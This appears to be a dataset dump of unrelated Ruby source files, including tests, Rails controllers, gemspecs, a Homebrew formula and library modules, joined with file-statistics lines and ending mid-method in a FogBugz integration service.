refute(c.valid?(0))
refute(c.valid?(4))
assert c.clamp?
assert_equal 1, c.clamp(0)
assert_equal 2, c.clamp(2)
assert_equal 3, c.clamp(4)
end
def test_indefinite_values_not_subject_to_constraints
c = Constraint.instance(1..3)
v = Validator.instance(c)
assert_equal([Extensions::Undefined, nil], v.validate(Extensions::Undefined, nil))
assert_equal([nil, nil], v.validate(nil, nil))
end
def test_undefine_strategy_returns_undefined
c = Validator.instance(Constraint.instance(1..3), strategy: :undefine)
assert_equal([Extensions::Undefined, nil], c.validate(5, nil))
end
def test_range_constraint_works_with_date
today = Date.today
past = today - 10
yesterday = today - 1
tomorrow = today + 1
future = today + 10
c = Constraint.instance(yesterday..tomorrow)
assert(c.valid?(yesterday))
assert(c.valid?(today))
assert(c.valid?(tomorrow))
refute(c.valid?(past))
refute(c.valid?(future))
end
def test_enum_constraint_works_with_numbers
c = Constraint.instance([1, 3])
assert(c.valid?(1))
assert(c.valid?(3))
refute(c.valid?(2))
refute(c.valid?(0))
refute(c.valid?(4))
end
def test_enum_constraint_works_with_dates
today = Date.today
past = today - 10
yesterday = today - 1
tomorrow = today + 1
future = today + 10
c = Constraint.instance([yesterday, tomorrow])
assert(c.valid?(yesterday))
assert(c.valid?(tomorrow))
refute(c.valid?(today))
refute(c.valid?(past))
refute(c.valid?(future))
end
def test_enum_constraint_works_with_strings
c = Constraint.instance(%w[yesterday tomorrow])
assert(c.valid?('yesterday'))
assert(c.valid?('tomorrow'))
refute(c.valid?('today'))
end
def test_enum_constraint_works_with_symbols
c = Constraint.instance([:yesterday, :tomorrow])
assert(c.valid?(:yesterday))
assert(c.valid?(:tomorrow))
refute(c.valid?(:today))
end
def test_symbol_enum_constraint_works_with_strings
c = Constraint.instance([:yesterday, :tomorrow])
assert(c.valid?('yesterday'))
assert(c.valid?('tomorrow'))
refute(c.valid?('today'))
end
def test_operator_constraint_raises_with_invalid_operator
ex = assert_raises do
OperatorConstraint.new(:x, 1)
end
assert '', ex.message
end
def test_operator_that_do_not_clamp_raise_if_strategy_clamp
%i(< > =~).each do |op|
err = assert_raises(ParamsReadyError) do
Validator.instance(:operator, op, 5, strategy: :clamp)
end
assert_equal "Clamping not applicable", err.message
end
end
def test_operator_constraint_works
c = OperatorConstraint.new(:<, 1)
assert c.valid?(0)
refute c.valid?(1)
refute c.clamp?
c = OperatorConstraint.new(:<=, 1)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 0, c.clamp(0)
assert_equal 1, c.clamp(100)
c = OperatorConstraint.new(:==, 1)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(1)
assert_equal 1, c.clamp(-100)
c = OperatorConstraint.new(:>=, 1)
refute c.valid?(0)
assert c.valid?(1)
assert c.clamp?
assert_equal 100, c.clamp(100)
assert_equal 1, c.clamp(-100)
c = OperatorConstraint.new(:>, 1)
assert c.valid?(2)
refute c.valid?(1)
refute c.clamp?
end
def test_operator_constraint_builder_works_with_proc
c = OperatorConstraint.build(:<) do
1
end
assert c.valid?(0)
refute c.valid?(1)
end
def test_operator_constraint_works_with_proc
one = Proc.new do
1
end
c = OperatorConstraint.new(:<, one)
assert c.valid?(0)
refute c.valid?(1)
refute c.clamp?
c = OperatorConstraint.new(:<=, one)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:==, one)
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:>=, one)
assert c.valid?(1)
refute c.valid?(0)
assert c.clamp?
assert_equal 1, c.clamp(0)
c = OperatorConstraint.new(:>, one)
assert c.valid?(2)
refute c.valid?(1)
refute c.clamp?
end
def test_operator_constraint_works_with_method
c = OperatorConstraint.new(:<, method(:one))
assert c.valid?(0)
refute c.valid?(1)
refute c.clamp?
c = OperatorConstraint.new(:<=, method(:one))
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:==, method(:one))
assert c.valid?(1)
refute c.valid?(2)
assert c.clamp?
assert_equal 1, c.clamp(5)
c = OperatorConstraint.new(:>=, method(:one))
assert c.valid?(1)
refute c.valid?(0)
assert c.clamp?
assert_equal 1, c.clamp(0)
c = OperatorConstraint.new(:>, method(:one))
assert c.valid?(2)
refute c.valid?(1)
refute c.clamp?
end
def test_operator_constraint_works_with_regex
c = OperatorConstraint.new(:=~, /a/)
assert c.valid?("cat")
refute c.valid?("cod")
end
def one
1
end
end
end
end | 29.861905 | 90 | 0.57742 |
11311815efa5331a69a14c7e7bfa0342883e8e79 | 3,512 | class Api::V1::AssetEventsController < Api::ApiController
before_action :set_asset_event, only: [:show, :update, :destroy]
before_action :set_asset, only: [:create]
before_action :set_event_type, only: [:create]
def show
if @typed_event
render status: 200, json: json_response(:success, data: @typed_event.api_json)
else
render status: 404, json: json_response(:fail, data: "Unable to find event.")
end
end
def destroy
authorize! :update, @asset_event
Rails.cache.delete("inventory_api" + @asset_event.transam_asset.object_key)
unless @asset_event.destroy
@status = :fail
@message = "Unable to destroy asset event due the following error: #{@asset_event.errors.messages}"
render status: 400, json: json_response(:fail, message: @message)
end
end
def update
authorize! :update, @typed_event
if @typed_event.update(form_params)
Rails.cache.delete("inventory_api" + @asset_event.transam_asset.object_key)
render status: 200, json: json_response(:success, data: @typed_event.api_json)
else
@status = :fail
@message = "Unable to update asset event due the following error: #{@typed_event.errors.messages}"
render status: 400, json: json_response(:fail, message: @message)
end
end
def create
authorize! :update, @event
@new_event = @asset.build_typed_event(@event_type.class_name.constantize)
@new_event.update(new_form_params)
if @new_event.save
Rails.cache.delete("inventory_api" + @asset.object_key)
render status: 200, json: json_response(:success, data: @new_event.api_json)
else
@status = :fail
@message = "Unable to create asset event due the following error: #{@new_event.errors.messages}"
render status: 400, json: json_response(:fail, message: @message)
end
end
def set_asset_event
@asset_event = AssetEvent.find_by(object_key: params[:id])
@typed_event = AssetEvent.as_typed_event(@asset_event)
unless @asset_event and @asset_event.viewable_by? current_user
@status = :fail
message = "Asset event #{params[:id]} not found."
render status: :not_found, json: json_response(:fail, message: message)
end
end
def set_asset
@asset = TransamAsset.find_by(object_key: params[:asset_object_key])
@typed_asset = TransamAsset.get_typed_asset(@asset)
unless @asset
@status = :fail
message = "Asset #{params[:asset_object_key]} not found."
render status: :not_found, json: json_response(:fail, message: message)
end
end
def set_event_type
@event_type = AssetEventType.find(params[:asset_event_type_id])
unless @event_type
@status = :fail
@data = {id: "Event type #{params[:event_type]} not found."}
render status: :not_found, json: json_response(:fail, data: @data)
else
unless @typed_asset.event_classes.include? @event_type.class_name.constantize
@status = :fail
@data = {id: "Event type #{params[:event_type]} not applicable to asset #{params[:asset_id]}."}
render status: :not_found, json: json_response(:fail, data: @data)
end
end
end
def form_params
params.permit(AssetEvent.allowable_params + @typed_event.class.name.constantize.allowable_params - [:asset_id, :asset_event_type_id])
end
def new_form_params
params.permit(AssetEvent.allowable_params + @event_type.class_name.constantize.allowable_params - [:asset_id, :asset_event_type_id])
end
end | 36.206186 | 137 | 0.70074 |
081f55e38471e878066660ee7efc603ece555c22 | 839 | ##
## stream_stage.rb
## Login : <lta@still>
## Started on Wed Sep 4 19:35:50 2013 Lta Akr
## $Id$
##
## Author(s):
## - Lta Akr <>
##
## Copyright (C) 2013 Lta Akr
module ActiveVlc::Stage
class Stream < Base
dump_childs { @chain }
def initialize
super :sout
@chain = []
end
def <<(stage)
@chain.push stage
@chain.flatten!
self
end
# See Parametric#visit
def visit(params)
super params
@chain.each { |c| c.visit(params) }
end
# See Parametric#has_empty_param?
def has_missing_parameter?
@chain.reduce(super) { |accu, substage| accu or substage.has_missing_parameter? }
end
def fragment
return "" if @chain.empty?
sout_string = @chain.map{|s| s.fragment}.join ':'
res = ":sout=\"##{sout_string}\""
end
end
end
| 19.068182 | 87 | 0.585221 |
03db15e10498386c066d153eb2b0d0bab8241560 | 860 | class Scamper < Formula
desc "Advanced traceroute and network measurement utility"
homepage "https://www.caida.org/tools/measurement/scamper/"
url "https://www.caida.org/tools/measurement/scamper/code/scamper-cvs-20161204a.tar.gz"
sha256 "78eeabed8a4161a2238d02dac4c4361c9fb78f53d52fd8dd4bdb27434b512038"
bottle do
cellar :any
sha256 "626e7d78b4c32c7f8d3c78ae13951767fd4a60be78ad517e01768d36c07df076" => :sierra
sha256 "0858a7f973b612a47adc86eaf03c37ce41a1520afe0501315636e1be64da9b48" => :el_capitan
sha256 "7b7b9d125411ca05a453c00bad2268085732e0e5e1bd8e48b7d30d6a8b789631" => :yosemite
end
depends_on "pkg-config" => :build
depends_on "openssl"
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 37.391304 | 92 | 0.753488 |
039f2bdf137b15dea0bfcfd8b0da69c65e37851f | 2,138 | require 'spec_helper'
describe 'fake' do
let :title do
'foo'
end
it { should be_valid_type }
describe 'tests of the types' do
{
:parameters =>
{:baddies => ['one', 'two'], :goodies => ['three', 'four']},
:properties =>
{:baddies => ['five', 'fix'], :goodies => ['seven', 'eight']},
:features =>
{:baddies => ['nine', 'ten'], :goodies => ['eleven', 'twelve']}
}.each do |k, v|
describe "#{k} checks" do
[v[:baddies], v[:baddies].first].each do |baddies|
it "should fail for #{baddies.size} baddies" do
expect do
should be_valid_type.send("with_#{k}".to_sym, baddies)
end.to raise_error(
RSpec::Expectations::ExpectationNotMetError,
/Invalid #{k}: #{Array(baddies).join(',')}/
)
end
end
[v[:goodies], v[:goodies].first].each do |goodies|
it "should pass with #{goodies.size} goodies" do
should be_valid_type.send("with_#{k}".to_sym, goodies)
end
end
end
end
end
describe 'tests that create a resource instance' do
let :params do
{ :three => 'value' }
end
it 'should pass when providers match' do
should be_valid_type.with_provider(:default)
end
it 'should fail when provider does not match' do
expect do
should be_valid_type.with_provider(:non_matching)
end.to raise_error(
RSpec::Expectations::ExpectationNotMetError,
/Expected provider: non_matching does not match: default/
)
end
it 'should pass when providers match' do
should be_valid_type.with_provider(:default)
end
it 'should fail with invalid parameters' do
expect do
should be_valid_type.with_set_attributes(
:four => 'three'
)
end.to raise_error(
Puppet::Error,
/Valid values match \/\(one\|two\)\//
)
end
it 'should not fail with valid parameters' do
should be_valid_type.with_set_attributes(
:four => 'one'
)
end
end
end
| 23.755556 | 71 | 0.566885 |
e81475589a0aa4c378844677e650f9a4723ed74b | 2,284 | require File.dirname(__FILE__) + '/../spec/spec_helper'
require File.dirname(__FILE__) + '/log_watcher_advanced'
describe LogWatcherAdvanced do
it "should execute for the first time with no file scan" do
last_run, memory, options = Time.now-3*60, {}, {}
plugin = LogWatcherAdvanced.new(last_run, memory, options)
plugin.should_receive(:option).with(:log_path).and_return('/var/log/my.log')
plugin.should_receive(:option).with(:service_name).and_return('MyService')
plugin.should_receive(:option).with(:value_pipe).and_return('value_pipe')
plugin.should_receive(:option).with(:error_pipe).and_return('error_pipe')
plugin.should_receive(:eval).once.with(%Q[`wc -c /var/log/my.log`]).and_return("0 /var/log/my.log")
plugin.build_report
@report_hash = plugin.data_for_server[:reports].inject({}){|r,d|r.merge!(d)}
@report_hash[:value].should == 0
end
it "should execute the second time with the right value and error command" do
last_run, memory, options = Time.now-3*60, {}, {}
memory[:last_run] = 0
plugin = LogWatcherAdvanced.new(last_run, memory, options)
plugin.should_receive(:option).with(:log_path).and_return('/var/log/my.log')
plugin.should_receive(:option).with(:service_name).and_return('MyService')
plugin.should_receive(:option).with(:value_pipe).and_return('value_pipe')
plugin.should_receive(:option).with(:error_pipe).and_return('error_pipe')
eval_run_count = 0
plugin.should_receive(:eval).exactly(3).times do |params|
case eval_run_count+=1
when 1
params.should == %Q[`wc -c /var/log/my.log`]
"10 /var/log/my.log"
when 2
params.should == %Q[`tail -c +0 /var/log/my.log | head -c 10 | value_pipe`]
"value_result"
when 3
params.should == %Q[`tail -c +0 /var/log/my.log | head -c 10 | error_pipe`]
"error_result"
end
end
plugin.should_receive(:build_alert).with('error_result').and_return('build_alert_result')
plugin.should_receive(:alert).with('build_alert_result', "")
plugin.build_report
@report_hash = plugin.data_for_server[:reports].inject({}){|r,d|r.merge!(d)}
@report_hash[:value].should == "value_result"
end
end | 36.83871 | 103 | 0.672067 |
bf08c15139356237d9b872ae87a9bb5a89f2c614 | 3,009 | # frozen_string_literal: true
# class that create school rooms
class SchoolRoomsController < ApplicationController
before_action :logged_in?
before_action :authenticate_coordinator?, except: [:index]
def new
@school_room = SchoolRoom.new
@all_courses = Course.all
end
def create
@school_room = SchoolRoom.new(school_rooms_params)
@school_room.name.upcase!
@all_courses = Course.all
if @school_room.save
redirect_to school_rooms_index_path, flash: { success: 'Turma criada' }
else
ocurred_errors(@school_room)
render :new
end
end
def edit
@school_room = SchoolRoom.find(params[:id])
@all_courses = Course.all
end
def index
if permission[:level] == 1
@my_school_rooms = SchoolRoom.joins(:discipline).merge(
Discipline.order(:name).where(department_id: department_by_coordinator)
).order(:name)
@disciplines = discipline_of_department(department_by_coordinator)
.order(:name)
.map(&:name)
else
@my_school_rooms = SchoolRoom.all
end
@my_school_rooms = @my_school_rooms.paginate(page: params[:page], per_page: 10)
# needs refactoring
# sort_school_rooms_by_allocation
end
def search_disciplines
@search_attribute = params[:current_search][:search]
@disciplines = discipline_of_department(department_by_coordinator).where(
'name LIKE :search', search: "%#{@search_attribute}%"
).order(:name)
if @disciplines.present?
@school_rooms = school_rooms_of_disciplines(@disciplines)
else
flash[:notice] = 'Nenhuma turma encontrada'
redirect_to school_rooms_index_path
end
end
def search_courses
require 'json'
search_param = params[:code]
courses = Course.find_by(code: search_param)
render inline: courses.to_json
end
def update
@school_room = SchoolRoom.find(params[:id])
@all_courses = Course.all
if @school_room.update_attributes(school_rooms_params_update)
success_message = 'A turma foi alterada com sucesso'
redirect_to school_rooms_index_path, flash: { success: success_message }
else
ocurred_errors(@school_room)
render :edit
end
end
def destroy
@school_room = SchoolRoom.find(params[:id])
coordinator = Coordinator.find_by(user_id: current_user.id)
if permission[:level] == 1 &&
coordinator.course.department == @school_room.discipline.department
@school_room.destroy
flash[:success] = 'A turma foi excluída com sucesso'
else
flash[:error] = 'Permissão negada'
end
redirect_to school_rooms_index_path
end
private
def school_rooms_params
params[:school_room].permit(
:name,
:discipline_id,
:vacancies,
course_ids: [],
category_ids: []
)
end
def school_rooms_params_update
params[:school_room].permit(
:discipline_id,
:vacancies,
course_ids: [],
category_ids: []
)
end
end
| 26.628319 | 83 | 0.684945 |
1afbc542933870c388497cdb4ca1ba402c5ee828 | 1,791 | # -*- ruby -*-
# encoding: utf-8
require File.expand_path("lib/google/cloud/functions/v1/version", __dir__)
Gem::Specification.new do |gem|
gem.name = "google-cloud-functions-v1"
gem.version = Google::Cloud::Functions::V1::VERSION
gem.authors = ["Google LLC"]
gem.email = "[email protected]"
gem.description = "The Cloud Functions API manages lightweight user-provided functions executed in response to events. Note that google-cloud-functions-v1 is a version-specific client library. For most uses, we recommend installing the main client library google-cloud-functions instead. See the readme for more details."
gem.summary = "API Client library for the Cloud Functions V1 API"
gem.homepage = "https://github.com/googleapis/google-cloud-ruby"
gem.license = "Apache-2.0"
gem.platform = Gem::Platform::RUBY
gem.files = `git ls-files -- lib/*`.split("\n") +
`git ls-files -- proto_docs/*`.split("\n") +
["README.md", "LICENSE.md", "AUTHENTICATION.md", ".yardopts"]
gem.require_paths = ["lib"]
gem.required_ruby_version = ">= 2.5"
gem.add_dependency "gapic-common", "~> 0.4"
gem.add_dependency "google-cloud-errors", "~> 1.0"
gem.add_dependency "grpc-google-iam-v1", ">= 0.6.10", "< 2.0"
gem.add_development_dependency "google-style", "~> 1.25.1"
gem.add_development_dependency "minitest", "~> 5.14"
gem.add_development_dependency "minitest-focus", "~> 1.1"
gem.add_development_dependency "minitest-rg", "~> 5.2"
gem.add_development_dependency "rake", ">= 12.0"
gem.add_development_dependency "redcarpet", "~> 3.0"
gem.add_development_dependency "simplecov", "~> 0.18"
gem.add_development_dependency "yard", "~> 0.9"
end
| 45.923077 | 325 | 0.670017 |
ac7c9cdf88246696f98712c83658d0564d4b3139 | 157 | # frozen_string_literal: true
module SauceBindings
class SessionNotStartedError < RuntimeError; end
class InvalidPlatformError < RuntimeError; end
end
| 19.625 | 50 | 0.821656 |
87776d33e2d237319ea342fe4a795f227b4aaa08 | 704 | # frozen_string_literal: true
require 'uploadcare'
module Uploadcare
module Param
# This header is added to track libraries using Uploadcare API
class UserAgent
# Generate header from Gem's config
#
# @example Uploadcare::Param::UserAgent.call
# UploadcareRuby/3.0.0-dev/Pubkey_(Ruby/2.6.3;UploadcareRuby)
def self.call
framework_data = Uploadcare.config.framework_data || ''
framework_data_string = '; ' + Uploadcare.config.framework_data unless framework_data.empty?
public_key = Uploadcare.config.public_key
"UploadcareRuby/#{VERSION}/#{public_key} (Ruby/#{RUBY_VERSION}#{framework_data_string})"
end
end
end
end
| 32 | 100 | 0.698864 |
18ce6672d148038dc1e1aadbdabd66c0adec62da | 493 | # frozen_string_literal: true
module Types
module Notes
class DiffPositionInputType < DiffPositionBaseInputType
graphql_name 'DiffPositionInput'
argument :old_line, GraphQL::Types::Int, required: false,
description: copy_field_description(Types::Notes::DiffPositionType, :old_line)
argument :new_line, GraphQL::Types::Int, required: false,
description: copy_field_description(Types::Notes::DiffPositionType, :new_line)
end
end
end
| 32.866667 | 93 | 0.726166 |
87558d3b2d5c4b5ee84ad3912c129b04c1256b56 | 599 | # frozen_string_literal: true
module LedgerSync
module Domains
class Operation
class Resource
include LedgerSync::Domains::Operation::Mixin
def resource_class
@resource_class ||= inferred_resource_class
end
private
def inferred_resource_class
name = self.class.to_s.split('::')
name.pop # remove serializer/operation class from name
resource = name.pop.singularize # pluralized resource module name
self.class.const_get((name + [resource]).join('::'))
end
end
end
end
end
| 23.038462 | 75 | 0.632721 |
f800911ccc97fb8d7c0d8bb3bc2982930c4eabb4 | 1,703 | require 'cucumber/formatter/pretty'
module Cucumber
module Cli
class LanguageHelpFormatter < Formatter::Pretty
INCOMPLETE = %{
The Cucumber grammar has evolved since this translation was written.
Please help us complete the translation by translating the missing words in
#{Cucumber::LANGUAGE_FILE}
Then contribute back to the Cucumber project. Details here:
http://wiki.github.com/aslakhellesoy/cucumber/spoken-languages
}
def self.list_languages(io)
raw = Cucumber::LANGUAGES.keys.sort.map do |lang|
[lang, Cucumber::LANGUAGES[lang]['name'], Cucumber::LANGUAGES[lang]['native']]
end
table = Ast::Table.new(raw)
new(nil, io, {:check_lang=>true}, '').visit_multiline_arg(table, :passed)
end
def self.list_keywords(io, lang)
raw = Cucumber::KEYWORD_KEYS.map do |key|
[key, Cucumber::LANGUAGES[lang][key]]
end
table = Ast::Table.new(raw)
new(nil, io, {:incomplete => Cucumber.language_incomplete?(lang)}, '').visit_multiline_arg(table, :passed)
end
def visit_multiline_arg(table, status)
if @options[:incomplete]
@io.puts(format_string(INCOMPLETE, :failed))
end
super
end
def visit_table_row(table_row, status)
@col = 1
super
end
def visit_table_cell_value(value, width, status)
if @col == 1
if(@options[:check_lang])
@incomplete = Cucumber.language_incomplete?(value)
end
status = :comment
elsif @incomplete
status = :failed
end
@col += 1
super(value, width, status)
end
end
end
end | 28.864407 | 114 | 0.62478 |
6a797744b39b5ba420a04161cecbaa77df15a899 | 472 | class User < ApplicationRecord
# Include default devise modules. Others available are:
# :confirmable, :lockable, :timeoutable, :trackable and :omniauthable
devise :database_authenticatable, :invitable,
:recoverable, :rememberable, :validatable
enum role: [
:admin,
:operator
]
has_many :facilities, inverse_of: :author
has_many :patients, inverse_of: :author
has_many :visits, inverse_of: :author
validates :role, presence: true
end
| 26.222222 | 71 | 0.726695 |
ed4e641d91af3d93b682629b0642f3f1ea60e42a | 42 | class BatchEvent < ActiveRecord::Base
end
| 14 | 37 | 0.809524 |
4ab664bd13b4bc53499f1befcea8ccb544590f8e | 45 | module FrozenRecord
VERSION = '0.16.0'
end
| 11.25 | 20 | 0.711111 |
f8414252cecf77c22b6f22e24a04eed01d6a6ee7 | 2,522 | # -*- encoding: utf-8 -*-
# stub: logstash-input-http 3.0.5 ruby lib
Gem::Specification.new do |s|
s.name = "logstash-input-http"
s.version = "3.0.5"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.metadata = { "logstash_group" => "input", "logstash_plugin" => "true" } if s.respond_to? :metadata=
s.require_paths = ["lib"]
s.authors = ["Elastic"]
s.date = "2017-06-23"
s.description = "This gem is a Logstash plugin required to be installed on top of the Logstash core pipeline using $LS_HOME/bin/logstash-plugin install gemname. This gem is not a stand-alone program"
s.email = "[email protected]"
s.homepage = "http://www.elastic.co/guide/en/logstash/current/index.html"
s.licenses = ["Apache License (2.0)"]
s.rubygems_version = "2.4.8"
s.summary = "Logstash Input plugin that receives HTTP requests"
s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<logstash-core-plugin-api>, ["<= 2.99", ">= 1.60"])
s.add_runtime_dependency(%q<logstash-codec-plain>, [">= 0"])
s.add_runtime_dependency(%q<stud>, [">= 0"])
s.add_runtime_dependency(%q<puma>, [">= 2.16.0", "~> 2.16"])
s.add_runtime_dependency(%q<rack>, ["~> 1"])
s.add_development_dependency(%q<logstash-devutils>, [">= 0"])
s.add_development_dependency(%q<logstash-codec-json>, [">= 0"])
s.add_development_dependency(%q<ftw>, [">= 0"])
else
s.add_dependency(%q<logstash-core-plugin-api>, ["<= 2.99", ">= 1.60"])
s.add_dependency(%q<logstash-codec-plain>, [">= 0"])
s.add_dependency(%q<stud>, [">= 0"])
s.add_dependency(%q<puma>, [">= 2.16.0", "~> 2.16"])
s.add_dependency(%q<rack>, ["~> 1"])
s.add_dependency(%q<logstash-devutils>, [">= 0"])
s.add_dependency(%q<logstash-codec-json>, [">= 0"])
s.add_dependency(%q<ftw>, [">= 0"])
end
else
s.add_dependency(%q<logstash-core-plugin-api>, ["<= 2.99", ">= 1.60"])
s.add_dependency(%q<logstash-codec-plain>, [">= 0"])
s.add_dependency(%q<stud>, [">= 0"])
s.add_dependency(%q<puma>, [">= 2.16.0", "~> 2.16"])
s.add_dependency(%q<rack>, ["~> 1"])
s.add_dependency(%q<logstash-devutils>, [">= 0"])
s.add_dependency(%q<logstash-codec-json>, [">= 0"])
s.add_dependency(%q<ftw>, [">= 0"])
end
end
| 45.854545 | 201 | 0.626883 |
18c70de5bf6621e1768c3adbc1cd5f308f157163 | 317 | # frozen_string_literal: true
class RemoveDefaultsFromCardSetsColumns < ActiveRecord::Migration[5.2]
def change
change_column_default(:card_sets, :name, from: '', to: nil)
change_column_default(:card_sets, :slug, from: '', to: nil)
change_column_default(:card_sets, :code, from: '', to: nil)
end
end
| 31.7 | 70 | 0.725552 |
1c39c58dd978904541a5c8210db7ddac6f0c40ca | 295 | # frozen_string_literal: true
class SorceryCore < ActiveRecord::Migration[4.2]
def change
create_table :users do |t|
t.string :email, null: false
t.string :crypted_password
t.string :salt
t.timestamps
end
add_index :users, :email, unique: true
end
end
| 18.4375 | 48 | 0.667797 |
ab0e6db4c4656442131e96034a0e833b8a4ad796 | 2,415 | # frozen_string_literal: true
module HealthQuest
module Resource
##
# A service object for isolating dependencies from the resource controller.
#
# @!attribute session_service
# @return [HealthQuest::Lighthouse::Session]
# @!attribute user
# @return [User]
# @!attribute query
# @return [Query]
# @!attribute resource_identifier
# @return [String]
# @!attribute options_builder
# @return [Shared::OptionsBuilder]
#
class Factory
attr_reader :session_service, :user, :query, :resource_identifier, :options_builder
##
# Builds a Factory instance from a given User
#
# @param user [User] the currently logged in user.
# @return [Factory] an instance of this class
#
def self.manufacture(opts = {})
new(opts)
end
def initialize(opts)
@user = opts[:user]
@resource_identifier = opts[:resource_identifier]
@session_service = HealthQuest::Lighthouse::Session.build(user: user, api: opts[:api])
@query = Query.build(session_store: session_service.retrieve,
api: opts[:api],
resource_identifier: resource_identifier)
@options_builder = Shared::OptionsBuilder
end
##
# Gets the resource by it's unique ID
#
# @param id [String] a unique string value
# @return [FHIR::ClientReply]
#
def get(id) # rubocop:disable Rails/Delegate
query.get(id)
end
##
# Gets resources from a given set of key/values
#
# @param filters [Hash] the set of query options.
# @return [FHIR::ClientReply] an instance of ClientReply
#
def search(filters = {})
filters.merge!(resource_name)
with_options = options_builder.manufacture(user, filters).to_hash
query.search(with_options)
end
##
# Create a resource for the logged in user.
#
# @param data [Hash] data submitted by the user.
# @return [FHIR::ClientReply] an instance of ClientReply
#
def create(data)
query.create(data, user)
end
##
# Builds the key/value pair for identifying the resource
#
# @return [Hash] a key value pair
#
def resource_name
{ resource_name: resource_identifier }
end
end
end
end
| 28.081395 | 94 | 0.601656 |
014797b1a23c5ee601532f27adc1c1ca20aa15a8 | 127 | class RemoveUserIdFromRating < ActiveRecord::Migration
def change
remove_column :ratings, :user_id, :reference
end
end
| 21.166667 | 54 | 0.779528 |
91dbc33bb52051cc8792c06877116565590e7f88 | 1,168 | module Fog
module OpenStack
class Metric
class Real
def get_resource_metric_measures(resource_id, metric_name, options = {})
request(
:expects => 200,
:method => 'GET',
:path => "resource/generic/#{resource_id}/metric/#{metric_name}/measures",
:query => options
)
end
end
class Mock
def get_resource_metric_measures(_resource_id, _metric_name, _options = {})
response = Excon::Response.new
response.status = 200
response.body = [
[
"2014-10-06T14:00:00+00:00",
3600.0,
24.7
],
[
"2014-10-06T14:34:00+00:00",
60.0,
15.5
],
[
"2014-10-06T14:34:12+00:00",
1.0,
6.0
],
[
"2014-10-06T14:34:20+00:00",
1.0,
25.0
]
]
response
end
end
end
end
end
| 24.851064 | 91 | 0.385274 |
87708e8a11e0bed5b3a9487db41943bcfe89cf3f | 133 | class AddUserToRsvp < ActiveRecord::Migration
def change
add_reference :rsvps, :user, index: true, foreign_key: true
end
end
| 22.166667 | 63 | 0.75188 |
1df2e264d138160336a846397ef86e1ce5ced46c | 3,772 | # frozen_string_literal: true
require "set"
require "active_support/core_ext/module/attribute_accessors"
require "active_support/dependencies/interlock"
module ActiveSupport # :nodoc:
module Dependencies # :nodoc:
require_relative "dependencies/require_dependency"
extend self
UNBOUND_METHOD_MODULE_NAME = Module.instance_method(:name)
private_constant :UNBOUND_METHOD_MODULE_NAME
mattr_accessor :interlock, default: Interlock.new
# :doc:
# Execute the supplied block without interference from any
# concurrent loads.
def self.run_interlock
Dependencies.interlock.running { yield }
end
# Execute the supplied block while holding an exclusive lock,
# preventing any other thread from being inside a #run_interlock
# block at the same time.
def self.load_interlock
Dependencies.interlock.loading { yield }
end
# Execute the supplied block while holding an exclusive lock,
# preventing any other thread from being inside a #run_interlock
# block at the same time.
def self.unload_interlock
Dependencies.interlock.unloading { yield }
end
# :nodoc:
def eager_load?(path)
Dependencies._eager_load_paths.member?(path)
end
# The set of directories from which we may automatically load files. Files
# under these directories will be reloaded on each request in development mode,
# unless the directory also appears in autoload_once_paths.
mattr_accessor :autoload_paths, default: []
# The set of directories from which automatically loaded constants are loaded
# only once. All directories in this set must also be present in +autoload_paths+.
mattr_accessor :autoload_once_paths, default: []
# This is a private set that collects all eager load paths during bootstrap.
# Useful for Zeitwerk integration. Its public interface is the config.* path
# accessors of each engine.
mattr_accessor :_eager_load_paths, default: Set.new
# An array of qualified constant names that have been loaded. Adding a name
# to this array will cause it to be unloaded the next time Dependencies are
# cleared.
mattr_accessor :autoloaded_constants, default: []
def clear
end
# Is the provided constant path defined?
def qualified_const_defined?(path)
Object.const_defined?(path, false)
end
# Search for a file in autoload_paths matching the provided suffix.
def search_for_file(path_suffix)
path_suffix += ".rb" unless path_suffix.end_with?(".rb")
autoload_paths.each do |root|
path = File.join(root, path_suffix)
return path if File.file? path
end
nil # Gee, I sure wish we had first_match ;-)
end
# Determine if the given constant has been automatically loaded.
def autoloaded?(desc)
return false if desc.is_a?(Module) && real_mod_name(desc).nil?
name = to_constant_name desc
return false unless qualified_const_defined?(name)
autoloaded_constants.include?(name)
end
# Convert the provided const desc to a qualified constant name (as a string).
# A module, class, symbol, or string may be provided.
def to_constant_name(desc) # :nodoc:
case desc
when String then desc.delete_prefix("::")
when Symbol then desc.to_s
when Module
real_mod_name(desc) ||
raise(ArgumentError, "Anonymous modules have no name to be referenced by")
else raise TypeError, "Not a valid constant descriptor: #{desc.inspect}"
end
end
private
# Returns the original name of a class or module even if `name` has been
# overridden.
def real_mod_name(mod)
UNBOUND_METHOD_MODULE_NAME.bind_call(mod)
end
end
end
| 33.380531 | 86 | 0.711559 |
f7a706c8daa58c7f133f419bf2094b5b2b0d78f0 | 2,439 | class Service::FogBugz < Service::Base
title 'FogBugz'
string :project_url, :placeholder => "https://yourproject.fogbugz.com",
:label => 'URL to your FogBugz project:'
string :api_token, :placeholder => 'API Token',
:label => 'Your FogBugz API Token.'
page 'API Token', [:project_url, :api_token]
# Create an issue
def receive_issue_impact_change(config, payload)
http.ssl[:verify] = true
post_body = {
:sTitle => "#{payload[:title]} [Crashlytics]",
:sEvent => build_case_event(payload)
}
response = http_post fogbugz_url(:cmd => 'new') do |req|
req.body = post_body
end
fogbugz_case, error = parse_response(response, 'response/case')
if fogbugz_case && !error
{ :fogbugz_case_number => fogbugz_case.attr('ixBug') }
else
raise "Could not create FogBugz case: Response: #{error}"
end
end
def receive_verification(config, _)
http.ssl[:verify] = true
response = http_get fogbugz_url(:cmd => 'listProjects')
project, error = parse_response(response, 'response/projects')
if project && !error
[true, 'Successfully verified Fogbugz settings']
else
if error
log "Received verification failed: Error code #{error.attr('code')} API key: #{config[:api_key]} Response: #{error}"
else
